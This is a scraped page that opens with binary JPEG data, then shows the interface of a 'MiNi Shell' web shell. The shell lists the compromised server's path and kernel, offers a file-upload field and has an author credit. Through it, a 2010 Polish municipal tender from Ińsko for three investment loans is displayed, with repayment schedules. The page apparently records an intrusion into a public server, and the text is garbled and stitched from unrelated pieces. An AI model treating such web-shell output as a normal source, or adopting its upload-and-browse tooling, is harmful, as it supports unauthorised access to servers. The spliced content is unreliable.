JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/112713-N-2010.html

<p class="kh_header"><b>Ińsko: UDZIELENIE KREDYTÓW INWESTYCYJNYCH 
NA REALIZACJĘ ZADAŃ:

I: PRZEBUDOWA DROGI GMINNEJ W DZIAŁCE NR 337, 372/2 I 373 - UL. ALEJA SŁONECZNA I UL. ALEJA SPACEROWA W IŃSKU DO KWOTY 350.000,00 ZŁ

II: BUDOWA KOMPLEKSU BOISK SPORTOWYCH W RAMACH PROGRAMU :MOJE BOISKO - ORLIK 2010 (BOISKO PIŁKARSKIE ORAZ BOISKO WIELOFUNKCYJNE WRAZ Z ZAPLECZEM SANITARNO-SZATNIOWYM) W IŃSKU UL. POPRZECZNA 1  DO KWOTY 350.000,00 ZŁ;

III: (BUDOWA SIECI WODOCIĄGOWEJ PRZESYŁOWEJ STORKOWO - WALISZEWO WRAZ Z PRZYŁĄCZENIAMI WODOCIĄGOWYMI W MIEJSCOWOŚCI WALISZEWO) DO KWOTY 300.000,00 ZŁ.</b><br>
<b>Numer ogłoszenia: 112713 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy i Miasta , ul. Boh. Warszawy 38, 73-140 Ińsko, woj. zachodniopomorskie, tel. 091 5623025, faks 091 5623063.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.insko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UDZIELENIE KREDYTÓW INWESTYCYJNYCH 
NA REALIZACJĘ ZADAŃ:

I: PRZEBUDOWA DROGI GMINNEJ W DZIAŁCE NR 337, 372/2 I 373 - UL. ALEJA SŁONECZNA I UL. ALEJA SPACEROWA W IŃSKU DO KWOTY 350.000,00 ZŁ

II: BUDOWA KOMPLEKSU BOISK SPORTOWYCH W RAMACH PROGRAMU :MOJE BOISKO - ORLIK 2010 (BOISKO PIŁKARSKIE ORAZ BOISKO WIELOFUNKCYJNE WRAZ Z ZAPLECZEM SANITARNO-SZATNIOWYM) W IŃSKU UL. POPRZECZNA 1  DO KWOTY 350.000,00 ZŁ;

III: (BUDOWA SIECI WODOCIĄGOWEJ PRZESYŁOWEJ STORKOWO - WALISZEWO WRAZ Z PRZYŁĄCZENIAMI WODOCIĄGOWYMI W MIEJSCOWOŚCI WALISZEWO) DO KWOTY 300.000,00 ZŁ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje udzielenie kredytów inwestycyjnych na realizację zadań:

 I: Przebudowa drogi gminnej w działce nr 337, 372-2 i 373 - ul. Aleja Słoneczna i ul. Aleja Spacerowa w Ińsku do kwoty 350.000,00 zł;

II: Budowa kompleksu boisk sportowych w ramach programu :Moje boisko - Orlik 2010 (boisko piłkarskie oraz boisko wielofunkcyjne wraz z zapleczem sanitarno-szatniowym) w Ińsku ul. Poprzeczna 1 do kwoty 350.000,00 zł;
III: Budowa sieci wodociągowej przesyłowej Storkowo - Waliszewo wraz z przyłączeniami wodociągowymi w miejscowości Waliszewo do kwoty 300.000,00 zł.

Warunki udzielenia i spłaty kredytu omówione oddzielnie dla każdej części w rozdziale IV SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić zezwolenie Komisji Nadzoru Finansowego na rozpoczęcie i prowadzenie działalności bankowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić wykaz placówek obsługi klienta oraz oświadczenie o posiadaniu elektronicznego systemu obsługi klienta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca obowiązany jest załączyć do oferty wzór umowy kredytowej, określający szczegółowe warunki na jakich zostanie udzielony kredyt wraz z jego obsługą. Wykonawca zobowiązany jest zawrzeć w złożonym wzorze umowy wymagane przez zamawiającego postanowienia zawarte w SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.insko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta
ul. Boh. Warszawy  38
73-140 Ińsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 09:00, miejsce: Urząd Gminy i Miasta
ul. Boh. Warszawy  38
73-140 Ińsko
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Udzielenie kredytu inwestycyjnego do kwoty 350.000,00 zł w walucie polskiej na realizację zadania: Przebudowa drogi gminnej w działce nr 337, 372-2 i 373 - ul. Aleja Słoneczna i ul. Aleja Spacerowa w Ińsku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kredyt będzie udzielony w jednej transzy przelewem na rachunek podstawowy Urzędu Gminy i Miasta w Ińsku w terminie do 30.06.2010 r. według zapotrzebowania Zamawiającego. 
2. Do wyliczenia ceny w ofercie Zamawiający przyjmuje datę uruchomienia kredytu: na dzień 10.06.2010 r., data naliczania odsetek na ostatni dzień miesiąca, począwszy od 30.06.2010r. 
3.  Okres kredytowania (wymagany) 30.04.2018 r. 
4.  Zamawiający ustala jako formę zabezpieczenia kredytu weksel in blanco. 
5.  Spłata kredytu nastąpi w 17 ratach kapitałowych: 
- I rata: 30.06.2014 r. - 14.583,33 zł 
- II rata: 30.09.2014 r. - 21.875,00 zł 
- III rata: 31.12.2014 r. - 21.875,00 zł 
- IV rata: 31.03.2015 r. - 21.875,00 zł
- V rata: 30.06.2015 r. - 21.875,00 zł
- VI rata 30.09.2015 r. - 21.875,00 zł
- VII rata 31.12.2015 r. - 21.875,00 zł
- VIII rata 31.03.2016 r. - 21.875,00 zł
- IX rata 30.06.2016 r. - 21.875,00 zł
- X rata 30.09.2016 r. - 21.875,00 zł
- XI rata 31.12.2016 r. - 21.875,00 zł
- XII rata: 31.03.2017 r. - 21.875,00 zł
- XIII rata: 30.06.2017 r. - 21.875,00 zł
- XIV rata: 30.09.2017 r. - 21.875,00 zł
- XV rata: 31.12.2017 r. - 21.875,00 zł
- XVI rata: 31.03.2018 r. - 21.875,00 zł
- XVII rata:  30.04.2018 r. - 7.291,67 zł

6. Oprocentowanie kredytu złotówkowego będzie liczone w oparciu o oprocentowanie zmienne tj. aktualną stawkę referencyjną WIBOR 3M z dnia 15.03.2010r. powiększoną o stałą marżę banku. Odsetki od kredytu naliczone będą tylko od aktualnego rzeczywistego zadłużenia według kalendarza rzeczywistego. 
7. Rozliczenia pomiędzy Zamawiającym a Wykonawca dokonywane będą w PLN. 
8. Prowizja wyrażona procentowo do całości wartości kredytu nie może przekroczyć 0,5 %. 
9. Nie będą pobierane:  
- opłaty i prowizje bankowe od salda niewykorzystanej części kredytu oraz od operacji związanych z wcześniejszą spłatą kredytu, 
- odsetki od części kredytu spłaconego w terminie wcześniejszym niż zawarty w umowie za okres od daty dokonania wcześniejszej spłaty. 
10. Odsetki od wykorzystanego kredytu Zamawiający płacić będzie przez cały okres trwania umowy na ostatni dzień każdego miesiąca, za który zostały naliczone. 
11. Karencja w spłacie kredytu obejmuje okres do 29.06.2014 r. 
12. Prowizja od zmian w umowie w wysokości 0,00% wartości dokonywanej zmiany. 
13. Kredyt nie musi być wykorzystany w całości, z tego tytułu Zamawiający nie ponosi żadnych opłat. 
14. Bank kredytujący dopuszcza możliwość spłaty kredytu w terminie wcześniejszym niż określony umową. 
15. Zamawiający zastrzega sobie możliwość zmian redakcyjnych projektu umowy. 
16. Zamawiający dopuszcza możliwość podpisania oświadczenia o poddaniu się egzekucji w trybie ustawy z dnia 29.08.1997 r. Prawo Bankowe. 
17. Zamawiający dopuszcza możliwość złożenia kontrasygnaty Skarbnika na wekslu zabezpieczającym kredyt. 
18. Wykonawca powinien posiadać minimum jedną placówkę obsługi klienta zlokalizowaną na terenie miasta Szczecina albo Stargardu Szczecińskiego albo Ińska. 
19.Wykonawca musi posiadać elektroniczny system obsługi klienta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Udzielenie kredytu inwestycyjnego do kwoty 350.000,00 zł w walucie polskiej z przeznaczeniem na sfinansowanie zadania inwestycyjnego Budowa kompleksu boisk sportowych w ramach programu Moje Boisko - Orlik 2012 (boisko piłkarskie oraz boisko wielofunkcyjne wraz z zapleczem sanitarno - szatniowym) w Ińsku ul. Poprzeczna 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kredyt będzie udzielony w jednej transzy przelewem na rachunek podstawowy Urzędu Gminy i Miasta w Ińsku w terminie do 31.08.2010 r. według zapotrzebowania Zamawiającego. 
2. Do wyliczenia ceny w ofercie Zamawiający przyjmuje datę uruchomienia kredytu: na dzień 01.08.2010 r., data naliczania odsetek na ostatni dzień miesiąca, począwszy od 31.08.2010r. 
3.  Okres kredytowania (wymagany) 31.07.2018 r. 
4.  Zamawiający ustala jako formę zabezpieczenia kredytu weksel in blanco. 
5.  Spłata kredytu nastąpi w 17 ratach kapitałowych: 

- I rata: 30.09.2014 r. 	- 	14.583,33 zł 
- II rata: 31.12.2014 r. 	- 	21.875,00 zł 
- III rata: 31.03.2015 r. 	- 	21.875,00 zł 
- IV rata: 30.06.2015 r. 	- 	21.875,00 zł
- V rata: 30.09.2015 r. 	- 	21.875,00 zł
- VI rata 31.12.2015 r. 	- 	21.875,00 zł
- VII rata 31.03.2016 r. 	- 	21.875,00 zł
- VIII rata 30.06.2016 r. 	-	21.875,00 zł
- IX rata 30.09.2016 r. 	- 	21.875,00 zł
- X rata 31.12.2016 r. 	- 	21.875,00 zł
- XI rata 31.03.2017 r. 	- 	21.875,00 zł
- XII rata: 30.06.2017 r. 	-	21.875,00 zł
- XIII rata: 30.09.2017 r.	-	21.875,00 zł
- XIV rata: 31.12.2017 r. 	-	21.875,00 zł
- XV rata: 31.03.2018 r.	 -	21.875,00 zł
- XVI rata: 30.06.2018 r.	 -	21.875,00 zł
- XVII rata:  31.07.2018 r. -	  7.291,67 zł

6. Oprocentowanie kredytu złotówkowego będzie liczone w oparciu o oprocentowanie zmienne tj. aktualną stawkę referencyjną WIBOR 3M z dnia 15.03.2010r. powiększoną o stałą marżę banku. Odsetki od kredytu naliczone będą tylko od aktualnego rzeczywistego zadłużenia według kalendarza rzeczywistego.
7. Rozliczenia pomiędzy Zamawiającym a Wykonawca dokonywane będą w PLN. 
8. Prowizja wyrażona procentowo do całości wartości kredytu nie może przekroczyć 0,5 %. 
9. Nie będą pobierane:  
- opłaty i prowizje bankowe od salda niewykorzystanej części kredytu oraz od operacji związanych z wcześniejszą spłatą kredytu, 
- odsetki od części kredytu spłaconego w terminie wcześniejszym niż zawarty w umowie za okres od daty dokonania wcześniejszej spłaty. 
10. Odsetki od wykorzystanego kredytu Zamawiający płacić będzie przez cały okres trwania umowy na ostatni dzień każdego miesiąca, za który zostały naliczone. 
11. Karencja w spłacie kredytu obejmuje okres do 29.09.2014 r. 
12. Prowizja od zmian w umowie w wysokości 0,00% wartości dokonywanej zmiany. 
13. Kredyt nie musi być wykorzystany w całości, z tego tytułu Zamawiający nie ponosi żadnych opłat. 
14. Bank kredytujący dopuszcza możliwość spłaty kredytu w terminie wcześniejszym niż określony umową. 
15. Zamawiający zastrzega sobie możliwość zmian redakcyjnych projektu umowy. 
16. Zamawiający dopuszcza możliwość podpisania oświadczenia o poddaniu się egzekucji w trybie ustawy z dnia 29.08.1997 r. Prawo Bankowe. 
17. Zamawiający dopuszcza możliwość złożenia kontrasygnaty Skarbnika na wekslu zabezpieczającym kredyt. 
18. Wykonawca powinien posiadać minimum jedną placówkę obsługi klienta zlokalizowaną na terenie miasta Szczecina albo Stargardu Szczecińskiego albo Ińska. 
19.Wykonawca musi posiadać elektroniczny system obsługi klienta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Udzielenie kredytu inwestycyjnego do kwoty 300.000,00 zł w walucie polskiej z przeznaczeniem na sfinansowanie zadania inwestycyjnego Budowa sieci wodociągowej przesyłowej Storkowo - Waliszewo wraz z przyłączeniami wodociągowymi w miejscowości Waliszewo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kredyt będzie udzielony w jednej transzy przelewem na rachunek podstawowy Urzędu Gminy i Miasta w Ińsku w terminie do 31.08.2010 r. według zapotrzebowania Zamawiającego. 
2. Do wyliczenia ceny w ofercie Zamawiający przyjmuje datę uruchomienia kredytu: na dzień 15.08.2010 r., data naliczania odsetek na ostatni dzień miesiąca, począwszy od 31.08.2010r. 
3.  Okres kredytowania (wymagany) 31.07.2018 r. 
4.  Zamawiający ustala jako formę zabezpieczenia kredytu weksel in blanco. 
5.  Spłata kredytu nastąpi w 17 ratach kapitałowych: 

- I rata: 30.09.2014 r. 	- 	12.500,00 zł 
- II rata: 31.12.2014 r. 	- 	18.750,00 zł 
- III rata: 31.03.2015 r. 	- 	18.750,00 zł 
- IV rata: 30.06.2015 r. 	- 	18.750,00 zł
- V rata: 30.09.2015 r. 	- 	18.750,00 zł
- VI rata 31.12.2015 r. 	- 	18.750,00 zł
- VII rata 31.03.2016 r. 	- 	18.750,00 zł
- VIII rata 30.06.2016 r. 	-	18.750,00 zł
- IX rata 30.09.2016 r. 	- 	18.750,00 zł
- X rata 31.12.2016 r. 	- 	18.750,00 zł
- XI rata 31.03.2017 r. 	- 	18.750,00 zł
- XII rata: 30.06.2017 r. 	-	18.750,00 zł
- XIII rata: 30.09.2017 r.	-	18.750,00 zł
- XIV rata: 31.12.2017 r. 	-	18.750,00 zł
- XV rata: 31.03.2018 r.	 -	18.750,00 zł
- XVI rata: 30.06.2018 r.	 -	18.750,00 zł
- XVII rata:  31.07.2018 r. -	  6.250,00 zł
6. Oprocentowanie kredytu złotówkowego będzie liczone w oparciu o oprocentowanie zmienne tj. aktualną stawkę referencyjną WIBOR 3M z dnia 15.03.2010r. powiększoną o stałą marżę banku. Odsetki od kredytu naliczone będą tylko od aktualnego rzeczywistego zadłużenia według kalendarza rzeczywistego.
7. Rozliczenia pomiędzy Zamawiającym a Wykonawca dokonywane będą w PLN. 
8. Prowizja wyrażona procentowo do całości wartości kredytu nie może przekroczyć 0,5 %. 
9. Nie będą pobierane:  
- opłaty i prowizje bankowe od salda niewykorzystanej części kredytu oraz od operacji związanych z wcześniejszą spłatą kredytu, 
- odsetki od części kredytu spłaconego w terminie wcześniejszym niż zawarty w umowie za okres od daty dokonania wcześniejszej spłaty. 
10. Odsetki od wykorzystanego kredytu Zamawiający płacić będzie przez cały okres trwania umowy na ostatni dzień każdego miesiąca, za który zostały naliczone. 
11. Karencja w spłacie kredytu obejmuje okres do 29.09.2014 r. 
12. Prowizja od zmian w umowie w wysokości 0,00% wartości dokonywanej zmiany. 
13. Kredyt nie musi być wykorzystany w całości, z tego tytułu Zamawiający nie ponosi żadnych opłat. 
14. Bank kredytujący dopuszcza możliwość spłaty kredytu w terminie wcześniejszym niż określony umową. 
15. Zamawiający zastrzega sobie możliwość zmian redakcyjnych projektu umowy. 
16. Zamawiający dopuszcza możliwość podpisania oświadczenia o poddaniu się egzekucji w trybie ustawy z dnia 29.08.1997 r. Prawo Bankowe. 
17. Zamawiający dopuszcza możliwość złożenia kontrasygnaty Skarbnika na wekslu zabezpieczającym kredyt. 
18. Wykonawca powinien posiadać minimum jedną placówkę obsługi klienta zlokalizowaną na terenie miasta Szczecina albo Stargardu Szczecińskiego albo Ińska. 
19.Wykonawca musi posiadać elektroniczny system obsługi klienta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com